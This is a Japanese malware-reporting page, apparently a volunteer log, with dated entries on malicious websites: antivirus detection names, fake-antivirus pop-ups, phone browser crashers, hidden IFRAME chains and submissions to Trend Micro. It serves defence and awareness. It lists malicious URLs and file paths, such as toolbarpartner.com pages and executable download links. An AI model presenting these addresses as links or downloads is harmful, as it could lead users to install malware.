[2005/10/31] | 携帯電話で有害らしい。「はいさよなら」というメッセージが出た後電源が落ちるとのこと。
私の携帯電話( vodafone:V602SH )からアクセスしてみたが、何も無かった。 同社他機種・他社携帯電話では不明。 |
[2005/11/02] | au携帯電話で電源が落ちるらしい。 |
[2005/12/21] | 特定機種の携帯電話でブラクラが発動するらしい。パソコンで踏むと こんな感じ 。
鑑定結果は以下。 「踏んでみると、ウィルスについて書かれたFlashが流れます。戻れなくなりますが、携帯はブラウザ履歴消去で解決。」 |
[2005/12/26] | 「携帯用ブラクラです。強制電源OFF等のタグが組み込まれている様です。データフォルダの初期化等の被害もあるそうなので、注意して下さいませ。」 |
[2006/01/12] | 他の方の結果は以下の「」内。
「tool-3の、auの携帯を強制電源OFFタグページのアドレスじゃないのかな?と嫌々踏んでみたところウィルスを検出しました…(以下、嘘の警告文なので省略)の文字のページから一定時間脱出出来ないよう[戻る]も左クリックも電源OFFも操作無効にされました。 危険タグについてはキャリアと機種による差もありますが携帯有害。 当方の携帯では電源は落ちませんでしたが、バイブが勝手に起動して止まりませんでした。これは音量0に設定して開いたせいかもしれないです。」 |
[2005/10/31] | FDDアタックらしい。私の環境ではアクセス拒否であった。 |
[2005/12/08] | 他の方の結果では、
「ちょっと前はブラクラ(FDDアタック)が仕込んであったようです。現時点では黒背景に黒文字で「戻る」のリンクしかありません。リンク先も同じでした。」 |
[2005/12/10] | 再確認。踏むと こんな感じ 。ブラクラ発動やアクセス拒否は無かった。
よく見ると、[ ] の間に「戻る」というリンクがある。そのリンクを踏んでもブラクラは発動しなかった。 |
[2008/12/30] | ウィルス名:TROJ_AGENT.GIW |
[2007/01/06] | ウィルス名:PE_PARITE.A |
[2005/11/17] | ウィルス名:ADW_ISEARCH.B |
[2005/11/23] | ウィルス名:ADW_SOFTOMATE.A |
[2005/11/27] | //toolbar.startnow.com/SNToolbar.msiに飛ぶようになっていて、「SNToolbar.msi」をDLしろ、と言ってくる。しかし、その時点でウィルス名:ADW_HYPERBAR.Aを検出。 |
[2005/11/27] | このツールバー のファイルだが、ウィルス名:ADW_HYPERBAR.Aを検出。 |
[2005/12/23] | スパイウェア配布サイトと思われる。踏むと こんな感じ のサイトだが、ダイアログを表示し、ツールバーをインストールするよう催促される。
拒否すると、こんな感じ に変わる。 |
[2005/12/23] | スパイウェアの一種:アドウェアである。スタートページの改ざんも行うらしい。
バスター無反応だが、以下のアンチウィルスソフトで反応。 BitDefender → BehavesLike:Trojan.Downloader Dr.Web → DLOADER.Trojan Norman Virus Control → Sandbox: W32/Downloader |
[2006/02/01] | バスター無反応だが、以下のアンチウィルスソフトで反応。
BitDefender → BehavesLike:Trojan.Downloader Dr.Web → DLOADER.Trojan Kaspersky → Trojan-Downloader.Win32.Harnig.bb NOD32 → probably a variant of Win32/TrojanDownloader.Small.AOD Norman Virus Control → Sandbox: W32/Downloader VBA32 → MalwareScope.Downloader.Harnig.2 |
[2006/02/07] | 踏むと真っ白なページだが、多くのウィルスを検出。このユーザープロンプト画面 を複数表示する。
検出したウィルス名は以下。 EXPL_WMF.GEN 、TROJ_NASCENE.D 、JAVA_BYTEVER.A 、JAVA_BYTEVER.AQ 、JAVA_BYTEVER.C 、JAVA_BYTEVER.S |
[2006/02/07] | 真っ白なページだが、このユーザープロンプト画面 を表示する。
ソースのほとんどがコード変換されていて読みにくいように工夫されている。 |
[2006/02/07] | ウィルス名:JAVA_BYTEVER.AQ+JAVA_BYTEVER.S |
[2006/02/07] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.C |
[2006/02/07] | ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.D |
[2005/06/09] | jpg偽装URL。ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1
拡張子偽装。正しい拡張子はjar である。 |
[2005/06/09] | ウィルス名:JS_PSYME.AF+JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1
IFRAMEタグで以下の4つのURLを呼ぶ。 //toolbarpartner.com/adverts/2MAEjHcR/index2.html ← ウィルス反応あり。 //toolbarpartner.com/adverts/2MAEjHcR/index3.html ← ウィルス反応あり。 //toolbarpartner.com/cookies2.php ← ウィルス反応あり。 //www.daosearch.com/tests/genryf/main.html ←「Daosearch.com 」という海外サイト。バスター無反応。 |
[2005/06/09] | ウィルス名:JS_PSYME.AF |
[2005/06/09] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1
APPLETタグで /counter.jpg を実行しようとしている。 |
[2005/02/12] | 踏むとファイル名「ddfs.chm」というコンパイル済みHTMLペルプファイルをDL出来る。
バスター無反応だが以下のソフトでウィルスが検出される。 ・BitDefender でウィルス名:Exploit.ADODB.Stream.Gen ・ClamAV でウィルス名:Trojan.Downloader.Small-268 ・Kaspersky Anti-Virus でウィルス名:Exploit.HTML.CodeBaseExec, Trojan-Downloader.Win32.Agent.ho |
[2005/02/12] | 真っ白なページだがウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.Cを検出。 |
[2005/07/05] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1
直踏みでは意味不明の文字列のページ。 |
[2005/07/05] | ウィルス名:JS_PSYME.AF+JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1
IFRAMEタグで1、2、3を、OBJECTタグで4を呼び出す。 1、//toolbarpartner.com/adverts/Operator/index2.html ← バスター無反応。 2、//toolbarpartner.com/adverts/Operator/index3.html ← バスター反応。このURL解説も参照。 3、//toolbarpartner.com/cookies2.php ← バスター反応。このURL解説も参照。 4、//toolbarpartner.com//adverts//Operator//ddfs.chm ← バスター無反応。 |
[2005/07/05] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1
APPLET実行で以下のURLを呼び出す。 //toolbarpartner.com/adverts/Operator/counter.jpg |
[2005/05/05] | jpg画像ではなく、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1を検出。
このURLのキャプ画面は こんな感じ。 |
[2005/05/05] | 踏むとファイル名「ddfs.chm」というコンパイル済みHTMLペルプファイルが落ちてくる。
バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。 BitDefender → ウィルス名:Trojan.Downloader.Small.Gen, Exploit.ADODB.Stream.Gen ClamAV → ウィルス名:Trojan.Downloader.Small-462 Kaspersky Anti-Virus → ウィルス名:Trojan-Downloader.Win32.Small.amq NOD32 → ウィルス名:JS/TrojanDownloader.Small.V VBA32 → ウィルス名:Trojan-Downloader.Win32.Small.amq |
[2005/05/05] | ウィルス名:JS_PSYME.AF+JAVA_BYTEVER.A+JAVA_BYTEVER.K
IFRAMEタグで以下のURLを読んでいる。詳細はこれらのURL解説を参照。 //toolbarpartner.com/adverts/r222/index2.html //toolbarpartner.com/adverts/r222/index3.html //toolbarpartner.com/cookies2.php また、以下のURLをobject実行しようとしている。これのURL解説も参照。 //toolbarpartner.com//adverts/r222/ddfs.chm |
[2005/05/05] | ウィルス名:JS_PSYME.AF。//toolbarpartner.com/adverts/r222/page1.htmを呼ぶ。 |
[2005/05/05] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 |
[2005/05/05] | ウィルス名:JS_PSYME.AF。ウィルス検出後、すぐにアドレスが「res:///」に変わり、「ページを表示できません」となる。 |
[2005/06/12] | コンパイル済みHTMLヘルプファイルが落ちてくるが、ウィルス名:CHM_PSYME.BCを検出。 |
[2005/06/09] | ウィルス名:JS_PSYME.AF |
[2005/06/09] | ウィルス名:TROJ_DLOADER.KZ+JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 |
[2005/04/28] | ウィルス名:JS_PSYME.AFを検出。IFRAMEタグを使って以下の4つのURLを呼び出している。いずれも縦0ドット、横0ドットの大きさで呼び出している。
|
[2005/04/28] | ソースが暗号化されていてウィルス名:JS_PSYME.AFを検出。 |
[2005/05/05] | ウィルス名:JAVA_BYTEVER.A。IFRAMEタグで//ipassist.biz/root.htmlを呼び出している。 |
[2005/07/05] | 改めて確認。ウィルス名:JAVA_BYTEVER.A
IFRAMEタグで以下の1を呼び出してるが、一瞬、2を新窓で表示してすぐ閉じる現象を確認。 1、//ipassist.biz/root.html 2、//toolbarpartner.com/serr.html |
[2005/06/09] | //toolbarpartner.com/adverts/2MAEjHcR/index.htmlに飛ぶが、稀に以下のURLをIFRAMEタグで直接呼び出す時がある。
|
[2005/06/10] | IFRAMEタグで以下の4つのURLを呼び出す。
//toolbarpartner.com/adverts/serial.html ← ページが無い。 //ipassist.biz/ex/index.html ← バスター無反応だが、何かある模様。 //toolbarpartner.com/adverts/test3/index2.html ← URL解説を参照。 //toolbarpartner.com/adverts/test3/index3.html ← URL解説を参照。 |
[2005/07/05] | ウィルス名:JS_PSYME.AF+JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1
//toolbarpartner.com/adverts/Operator/index.htmlに飛ぶ。 |
[2005/04/28] | ウィルス名:JS_PSYME.AFを検出。
//toolbarpartner.com/adverts/Zergio/index.htmlに飛ぶ。このURL解説を参照。 |
[2007/02/03] | Internet Explorerの開始ページや検索ページを変更するブラウザ プラグインらしい。
2007/01/29 にトレンドマイクロ社にファイルを提出。 2007/02/02 にその結果の連絡があり、ウィルス名:ADW_EZTRACKS.AD として検出するよう対応した、とのこと。 2007/01/29 にDLしたファイルからウィルス名:ADW_EZTRACKS.AD を検出することを確認。 しかし、今日改めてDLしようとするが、ファイルが無かった。 |
[2008/12/30] | 2重拡張子。ウィルス名:TROJ_AGENT.AFSC |
[2004/07/20] | スパイウェア:Adware.Topotun を仕込まれる。スタートページの変更。お気に入りに特定のURLを追加。
検索オプションを変更してユーザーの検索要求の接続先を別のWebサイトに転送。 |
[2008/07/11] | これ を表示する。「OK」を選ぶとこれ を表示。さらに「OK」を選ぶと真っ白なウィンドウを開く。
「キャンセル」を選ぶと 真っ白なウィンドウを開く。 ページのタイトルは「 Antivirus 2008: download privacy protection software 」である。 悪質な呼び出し先は以下の @ のURLと思われる。@ の先に A がある。 @、//topvirusscan.com/1/script.js A、//antivirus-scanner.com/download/AtnvrsInstall.exe |
[2004/09/10] | ウィルス名:VBS_REDLOF.A |
[2004/06/20] | //ranktop100.wo.to に飛び、更に //starmapmaker.eg.ro に飛び、更に //www.albinoblacksheep.com/flash/you.html に飛ぶ。 |
[2009/02/11] | ウィルス名:TROJ_DROPPER.HIB として対応済だが、現在は 404 になっている。 |
[2008/12/30] | ウィルス名:TROJ_EKMQ.A |
[2008/12/30] | ウィルス名:PAK_GENERIC.001 |
[2006/02/01] | 何回か確認してみると、2種類のソースがあると思われる。以下の 1. と 2. を参照。
1. には//www.1webspace.org/loloii/ABC.html等を開いたウィンドウのアドレス欄に直打ちで打ち込んで行くと割と行きやすいと思われる。 2. には全く無関係のサイトを開いて、そのウィンドウのアドレス欄に直打ちで打ち込んで行くと割と行きやすいと思われる。 無論、何回か確認したら、1. と 2. が逆の時もあった。ソースチェッカーでは何回確認しても 2. であった。 |
[2006/02/01] | こんな感じ のページだが、ソースが怪しい。
バスター無反応だが、他社アンチウィルスソフトではウィルス反応があると思われる。 |
[2006/02/02] | 他の方の結果では「ClamWinで、IEの一時キャッシュから Exploit.MS05-001.gen の反応ありでした。」 |
[2006/02/02] | バスター無反応だが、以下のアンチウィルスソフトで反応。
Dr.Web → Trojan.DownLoader.6698 F-Prot → unknown virus Kaspersky → Trojan-Downloader.Win32.CWS.s NOD32 → a variant of Win32/TrojanDownloader.CWS Norman Virus Control → Sandbox: W32/Malware VBA32 → Trojan-Downloader.Win32.CWS.s |
[2006/02/02] | ウィルス名:JAVA_BYTEVER.AD |
[2006/08/22] | 再確認。ウィルス名:JAVA_BYTEVER.AD+JAVA_BYTEVER.BC |
[2006/02/01] | バスター無反応だが、以下のアンチウィルスソフトで反応。
ClamAV → VBS.Inor.CQ Dr.Web → Trojan.Inor Kaspersky → Trojan-Dropper.VBS.Inor.cq NOD32 → probably a variant of VBS/TrojanDropper.Inor.CQ Norman Virus Control → VBS/GenDrp.C |
[2006/02/01] | 真っ白なページだが、ソースを以下のHTML Applicationファイルを落とそうとしている。
//traff-store.com/gallery20075/l2/link1/2.php /link1/index.htmのソースは以下。
|
[2006/02/01] | 真っ白なページだが、ウィルス名:JAVA_BYTEVER.A を検出。
ソースを見ると、コード変換された部分がある。 |
[2006/03/01] | ウィルス名:JAVA_BYTEVER.A |
[2006/02/01] | ウィルス名:EXPL_WMF.GEN |
[2006/08/17] | ウィルス名:ADW_REPLACE.C |
[2006/04/14] | こんな感じ のサイト。踏むとHDDが唸り出し、多くのウィルスを検出。「xpl.wmf」ファイルもDLしろ、と言ってくる。
ウィルス名:TROJ_NASCENE.Y+EXPL_WMF.GEN+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC ソースのほとんどが暗号化されて読みにくいように工夫されている。 |
[2006/04/25] | 他の方の結果は以下の「」内。
「Win32/Exploit.WMF 、Win32/TrojanDownloader.Ani.gen 、Java/ClassLoader.AA 検出です。」 |
[2006/09/09] | ウィルス名:TROJ_NASCENE.Y+EXPL_WMF.GEN+HTML_Generic.Z+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC |
[2006/10/09] | ウィルス名:TROJ_ANIMOO.E |
[2006/10/16] | 2006/10/09 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.ESM として検出するよう対応、とのこと。 実際に 2006/10/09 にDLしたファイルからウィルス名:TROJ_DLOADER.ESM を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 新しいファイルに置き換えられている可能性がある。 |
[2006/04/14] | このサイト、不可解な挙動を確認。
|
[2006/04/14] | DLしようとした時点でウィルス名:TROJ_NASCENE.D を検出。ワザとDLした時点ではウィルス名:EXPL_WMF.GENを検出。 |
[2006/10/24] | 真っ白なページだが、ソースを見ると以下のURLが隠れている。
//traffic-acc.com/e/load.php |
[2006/10/19] | ウィルス名:EXPL_IFRAMEBO.A |
[2006/10/19] | 真っ白なページだが、ウィルス名:EXPL_IFRAMEBO.A を検出。
ソースを見るとIFRAMEタグで以下の2つのURLを呼び出している。 1、//traffic-acc.com/e/exp2.html ← 真っ白なページだが、注意。 2、//traffic-acc.com/e/girl.html ← ウィルス名:EXPL_IFRAMEBO.A |
[2006/10/24] | ファイル名「load.exe」という名の HTML Application/hta ファイルが落ちてくる。
2006/10/18 にトレンドマイクロ社に「load.exe」ファイルを提出。 今日、その結果の連絡があり、ウィルス名:TROJ_SMALL.DJO として検出するよう対応、とのこと。 実際に 2006/10/18 にDLしたファイルからウィルス名:TROJ_SMALL.DJO を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_SMALL.DJO を検出することを確認。 |
[2005/06/09] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.A-1
踏むとブラクラ並に色々なサイトが開く。そのサイトのURLは以下。重複分は除外。どのURLがウィルスを運んでくるかは未調査。 //onetolove.net/?CID=TB //www.galleryhousing.com/404/index.php //trafficadmin.net/out/send_out_n_ook.php?xpr=fa47c4e5f32cd9511e477739fe2154f0&ref=68&hshr=9114512140&chn=1&lcn=1 //www.zlam.com/ //www.casinobonusguide.com/ //traffic-splitter.com/sgo.php?id=120 //www.7adpower.com/popup4.htm //www.porn-nook.com/index.html //freedomtosucceed-japan.com/FSJ/FullPage/v13/LiveYourDreams.aspx?NoCount=1 |
[2006/10/19] | //traffic-acc.com/e/in.php に飛び、ウィルス名:EXPL_IFRAMEBO.A を検出。 |
[2004/04/04] | 変なプログラムをDLさせようとしてくる。NOを選ぶと自動的に同じものが開く。 |
[2006/05/07] | バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → EXP/HTML.CodeBaseEx Avast → VBS:Malware BitDefender → Trojan.Exploit.Html.Codebaseexec.CE DrWeb → Exploit.CodeBase eTrust-InoculateIT → SillyDL.8dy!Trojan Kaspersky → Trojan-Downloader.Win32.Harnig.bo McAfee → Exploit-CodeBase.chm NOD32v2 → HTML/Exploit.CodeBaseExec Panda → Exploit/CodeBase.BF Sophos → Troj/Codebase-Q VBA32 → MalwareScope.Downloader.Small.2 |
[2006/05/07] | バスター無反応だが、Dr.Web で Trojan.MulDrop.3313 を検出。 |
[2006/05/07] | バスター無反応だが、Dr.Web で Trojan.DownLoader.7045 を検出。 |
[2006/05/07] | ウィルス名:TROJ_STARTPA.FB [ ウィルスバスター ]
ウィルス名:Trojan.StartPage.1224 [ Dr.Web ] |
[2006/05/06] | ウィルス名:TROJ_DLOADER.ANY [ ウィルスバスター ]
ウィルス名:Trojan.Spambot [ Dr.Web ] DLすると以下の文の注意窓を表示する。その後、メモ帳が開く。 「このファイルを開くためのアクセス許可がありません。このファイルの所有者または管理者に問い合わせてアクセス許可を取得してください。」 |
[2006/05/06] | ウィルス名:TROJ_SPYWAD.AL [ ウィルスバスター ]
ウィルス名:Trojan.Fakealert [ Dr.Web ] DLすると以下の文の注意窓を表示する。その後、メモ帳が開く。 「このファイルを開くためのアクセス許可がありません。このファイルの所有者または管理者に問い合わせてアクセス許可を取得してください。」 |
[2006/05/06] | ウィルス名:TROJ_DAEMONIZ.AM [ ウィルスバスター ]
ウィルス名:Trojan.DownLoader.7030 [ Dr.Web ] DLすると以下の文の注意窓を表示する。その後、メモ帳が開く。 「このファイルを開くためのアクセス許可がありません。このファイルの所有者または管理者に問い合わせてアクセス許可を取得してください。」 |
[2006/05/06] | ウィルス名:TROJ_ADCLICKER.J [ ウィルスバスター ]
ウィルス名:Trojan.DownLoader.6990 [ Dr.Web ] DLすると以下の文の注意窓を表示する。その後、メモ帳が開く。 「このファイルを開くためのアクセス許可がありません。このファイルの所有者または管理者に問い合わせてアクセス許可を取得してください。」 |
[2006/05/06] | ウィルス名:TROJ_SMALL.BST 。DLすると これ を表示。 |
[2006/02/26] | 何回か確認してみると、2種類のソースが確認された。
|
[2006/02/26] | これ を表示して、ウィルス名:JS_ONLOADXPLT.Gを検出。 |
[2006/02/26] | ウィルス名:JAVA_BYTEVAR.AQ+JAVA_BYTEVAR.S |
[2006/02/26] | バスター無反応だが、以下のアンチウィルスソフトで反応。
BitDefender → BehavesLike:Trojan.Downloader Dr.Web → Trojan.DownLoader.6965 Kaspersky → Trojan-Downloader.Win32.Small.ckj NOD32 → a variant of Win32/TrojanDownloader.Small.CJG Norman Virus Control → Suspicious_F.gen VBA32 → MalwareScope.Downloader.Harnig.2 (paranoid heuristics) |
[2006/02/26] | バスターでは、DLする前からウィルス名:EXPL_WMF.GEN を検出。DL後では、ウィルス名:TROJ_NASCENE.D を検出。 |
[2007/01/15] | ウィルス名:Possible_Bnkr-2 |
[2007/01/22] | 2007/01/17 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_BANLOAD.BMU として検出するよう対応、とのこと。 実際に 2007/01/17 にDLしたファイルと今日改めてDLしたファイルからウィルス名:TROJ_BANLOAD.BMU を検出することを確認。 2007/01/17 から今日まではファイルの置き換えは無いと推測される。 |
[2007/01/22] | 2007/01/17 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_BANLOAD.BPV として検出するよう対応、とのこと。 実際に 007/01/17 にDLしたファイルと今日改めてDLしたファイルからウィルス名:TROJ_BANLOAD.BPV を検出することを確認。 007/01/17 から今日まではファイルの置き換えは無いと推測される。 |
[2007/01/22] | バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → TR/Dldr.Banload.LY.137 BitDefender → Trojan.Downloader.Banload.LY Dr.Web → Trojan.DownLoader.14059 F-Secure → Trojan-Downloader.Win32.Banload.bne Kaspersky → Trojan-Downloader.Win32.Banload.bne NOD32 → variant of Win32/TrojanDownloader.Banload.LY VBA32 → Trojan-Downloader.Win32.Banload.afs 2007/01/17 にトレンドマイクロ社にファイルを提出。 今日、その結果の連絡があり、「弊社では正常と判断したファイルで、検出対応は行わない。」とのこと。 |
[2006/01/21] | 踏むと こんな感じ のサイト。
すぐに「xpl.wmf」ファイルをDLしろ、と言ってくるが、ウィルス名:TROJ_NASCENE.Y+EXPL_WMF.GEN を検出。 更にその後、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC を検出。 更にその後、ウィルス名:TROJ_ANICMOO.X を数多く検出。 その間に、色々なアダルトサイトを開いていき、「xpl.wmf」ファイルをDLしろ、と何回も言ってくる。 |
[2006/01/21] | − 以下は2chでのレス −
|
[2007/04/11] | ウィルス名:WORM_BUGBEAR.A |
[2007/04/11] | ウィルス名:WORM_APOST.A |
[2007/04/11] | ウィルス名:PE_MAGISTR.DAM |
[2007/04/11] | ウィルス名:WORM_KLEZ.GEN |
[2007/04/11] | ウィルス名:ELF_LION.B9 |
[2007/04/11] | ウィルス名:WORM_HYBRIS.B |
[2007/04/11] | ウィルス名:TROJ_Generic |
[2007/04/11] | ウィルス名:PE_MAGISTR.B |
[2007/04/11] | ウィルス名:WORM_NETSKY.BO+WORM_NETSKY.DAM |
[2007/04/11] | ウィルス名:WORM_BUGBEAR.A |
[2007/04/11] | ウィルス名:WORM_BADTRANS.B |
[2007/04/11] | ウィルス名:WORM_BADTRANS.A |
[2007/04/11] | ウィルス名:PE_MAGISTR.B |
[2007/04/11] | ウィルス名:WORM_BUGBEAR.A |
[2007/04/11] | ウィルス名:WORM_SIRCAM.C |
[2007/04/11] | ウィルス名:PE_NIMDA.E.DAM |
[2007/04/11] | ウィルス名:PE_MAGISTR.B |
[2007/04/11] | ウィルス名:PE_BUGBEAR.DAM |
[2007/04/11] | ウィルス名:BKDR_IRCBOT.D |
[2007/04/11] | ウィルス名:WORM_HYBRIS.B |
[2007/04/11] | ウィルス名:VBS_INOR.D |
[2007/04/11] | ウィルス名:WORM_YAHA.K |
[2007/04/11] | ウィルス名:WORM_YAHA.K |
[2007/04/11] | ウィルス名:WORM_HYBRIS.B |
[2007/04/11] | ウィルス名:WORM_GONER.A |
[2007/04/11] | ウィルス名:VBS_HOMEPAGE.A |
[2007/04/11] | ウィルス名:WORM_KLEZ.H |
[2007/04/11] | ウィルス名:WORM_BADTRANS.B |
[2007/04/11] | ウィルス名:WORM_HYBRIS.B |
[2007/04/11] | ウィルス名:WORM_HYBRIS.D |
[2007/04/11] | ウィルス名:WORM_RBOT.CJN |
[2007/04/11] | ウィルス名:WORM_BADTRANS.B |
[2007/04/11] | ウィルス名:WORM_SWEN.A |
[2007/04/11] | ウィルス名:WORM_KLEZ.GEN |
[2007/04/11] | ウィルス名:BKDR_TASKREG.A |
[2007/04/11] | ウィルス名:UNIX_HIJACK.A+UNIX_RAMEN.B+UNIX_RAMEN.C+UNIX_RAMEN.D+UNIX_RAMEN.G+ELF_LION.15+ELF_RAMEN.10+ELF_RAMEN.C1 |
[2007/04/11] | ウィルス名:PE_MAGISTR.A |
[2007/04/11] | ウィルス名:WORM_BADTRANS.A |
[2007/04/11] | ウィルス名:WORM_HYBRIS.B |
[2007/04/11] | ウィルス名:WORM_KLEZ.H |
[2007/04/11] | ウィルス名:WORM_SOBIG.F |
[2007/04/11] | ウィルス名:WORM_BADTRANS.B |
[2007/04/11] | ウィルス名:PE_MAGISTR.B |
[2007/04/11] | ウィルス名:ELF_RAMEN.7+ELF_RAMEN.8+ELF_RAMEN.9+ELF_RAMEN.12+ELF_RAMEN.13+ELF_RAMEN.A-7+ELF_RAMEN.E-1+ELF_RAMEN.E-2+ELF_RAMEN.START |
[2007/04/11] | ウィルス名:PE_NIMDA.A.DAM |
[2007/04/11] | ウィルス名:WORM_BADTRANS.B |
[2007/04/11] | ウィルス名:UNIX_RAMEN.E-2+ELF_RAMEN.7+ELF_RAMEN.8+ELF_RAMEN.9+ELF_RAMEN.12+ELF_RAMEN.13+ELF_RAMEN.A-7+ELF_RAMEN.E-1+ELF_RAMEN.START |
[2007/04/11] | ウィルス名:WORM_KLEZ.H |
[2007/04/11] | ウィルス名:HTML_SADMIND.A+PERL_SADMIND.A+ELF_SADMIND.A+ELF_BOXPOISO.B+UNIX_SANDMIN.A+UNIX_SANDMIN.A-1+UNIX_SANDMIN.A-2+UNIX_SANDMIN.A-3 |
[2007/04/11] | ウィルス名:PE_NIMDA.E.DAM |
[2007/04/11] | ウィルス名:WORM_SOBIG.GEN |
[2007/04/11] | ウィルス名:WORM_BADTRANS.A |
[2007/04/11] | ウィルス名:WORM_SIRCAM.C |
[2007/04/11] | ウィルス名:WORM_KLEZ.GEN |
[2007/04/11] | ウィルス名:WORM_YAHA.K |
[2007/04/11] | ウィルス名:WORM_GRUEL.O |
[2007/04/11] | ウィルス名:PERL_SADMIND.A |
[2007/04/11] | ウィルス名:WORM_SOBIG.E |
[2007/04/11] | ウィルス名:WORM_GIBE.B |
[2007/04/11] | ウィルス名:PE_MAGISTR.B |
[2007/04/11] | ウィルス名:PE_MAGISTR.B.DAM |
[2007/04/11] | ウィルス名:WORM_MUSIC.D |
[2007/04/11] | ウィルス名:WORM_MYPARTY.A |
[2007/04/11] | ウィルス名:WORM_YARNER.B |
[2005/06/20] | ノートンがウィルス名:PWSteal Trojian を検出。
バスターではウィルス名:TROJ_TKITSPY.A+TROJ_TKITSPY.B+TROJ_PSWATCHER.A を検出。 以下のファイルが入っている。 Ecl1pse.dll ← ウィルス名:TROJ_TKITSPY.A WSKGSPY.VXD ← ウィルス名:TROJ_TKITSPY.B tminfo.dat ← ウィルス名:TROJ_PSWATCHER.A tminfo1.dat ← ウィルス名:TROJ_TKITSPY.B Winsock packet editor.exe ← ウィルス名:TROJ_TKITSPY.A |
[2008/06/29] | 2008/03/29 にトレンドマイクロ社にファイルを提出。
2008/04/04 にその結果の連絡があり、ウィルス名:TROJ_DROPPER.LAT として検出するよう対応した、とのこと。 2008/03/29 にDLしたファイルからウィルス名:TROJ_DROPPER.LAT を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_DROPPER.LAT を検出することを確認。 |
[2006/08/14] | DL+解凍すると「ieatgpc.dll」なるファイルが現れる。
バスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → ADSPY/WebEx.A.5 AVG → Adware Generic.JUB BitDefender → Adware.Webex.F CAT-QuickHeal → AdvWare.WebEx (Not a Virus) DrWeb → Adware.WebEx Ewido → Adware.WebEx F-Prot4 → W32/Webex.A@adw Ikarus → AdWare.WebEx Kaspersky → not-a-virus : AdWare.Win32.WebEx NOD32v2 → Win32/Adware.WebEx TheHacker → Adware/WebEx UNA → Adware.WebEx.4FB4 VBA32 → AdWare.WebEx |
[2006/08/14] | 2006/08/06 に「ieatgpc.dll」ファイルをトレンドマイクロ社に提出。
今日、その結果の連絡があり、「このファイルはウィルス検出対応は行わない」とのこと。 |
[2005/07/31] | 2chでの鑑定結果は以下。
「トロイの木馬が張られているらしい。MOD32で反応あり。」 「個人を選択しサムネイルが出てきたときにMOD32で反応あり。C\に張られるらしい。」 「マカフィーがウィルスを検出。」 |
[2005/07/31] | 踏むと こんな感じ のサイト。IFRAMEタグで以下の2つのURLを呼ぶ。
//64.186.138.100/counter/ //64.186.138.100/trafstat/trafhit.php ソースの通りに順次、読み込んで表示していくが、読み込みの最後の頃に //64.186.138.100/counter/ にアクセスしようとして一瞬フリーズする時がある。 読み込み後はバスター無反応で、怪しい箇所は見当たらなかったが、ほんの一瞬、下のURLにアクセスしている。 //64.186.138.100/counter/archive.jar ↑ この「archive.jar」ファイルをDL+Lhaplusで解凍すると、フォルダ1つとファイルが複数現れる。 全てのファイルでバスター無反応。0バイトのファイルもある。以下はLhaplusでの解凍結果。 〇 C:\WINDOWS\デスクトップ\archive.jar - 解凍を開始します。 × META-INF\MANIFEST.MF - アーカイブファイルが壊れている可能性があります。 〇 BlackBox.class - 正常に解凍されました。 × Beyond.class - アーカイブファイルが壊れている可能性があります。 〇 MyURLClassLoader.class - 正常に解凍されました。 × A.class - アーカイブファイルが壊れている可能性があります。 × B.class - アーカイブファイルが壊れている可能性があります。 × C.class - アーカイブファイルが壊れている可能性があります。 × D.class - アーカイブファイルが壊れている可能性があります。 エラーが発生しています。 |
[2005/01/05] | 真っ白なページだが、ウィルス名:HTML_MHTREDIR.A を検出。 |
[2009/08/01] | ファイルサイズ:66.0 KB 。ウィルス名:TROJ_ZBOT.CID |
[2007/01/22] | 2007/01/17 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_ZLOB.BWB として検出するよう対応、とのこと。 実際に 2007/01/17 にDLしたファイルと今日改めてDLしたファイルからウィルス名:TROJ_ZLOB.BWB を検出することを確認。 007/01/17 から今日まではファイルの置き換えは無いと推測される。 |
[2008/12/30] | 真っ白なページだが、ウィルス名:JS_PSYME.CJA+HTML_ADODB.HB を検出。
何かを呼び出している形跡がある。 また、このサイトは、'Microsoft Corporation'からの'Remote Data Services Data Control'アドオンを実行しようとしている。 |
[2008/12/30] | ウィルス名:TROJ_NUWAR.GFZ |
[2008/12/30] | こんな感じ のサイトだが、ウィルス名:HTML_AGENT.AVYZ を検出。
ソースを取得しようとしてもウィルスを検出する。また、ソースはほとんどがコード変換されている。 |
[2008/12/30] | 一瞬、こんな感じ のページを表示するが、ウィルス名:JS_AGENT.AAIV を検出。
すぐにアドレスが //tsstudio.it/get_flash_update.exe に変わり、「ページを表示できません」となる。 |
[2008/12/30] | 一瞬、こんな感じ のページを表示するが、ウィルス名:JS_AGENT.AAIV を検出。
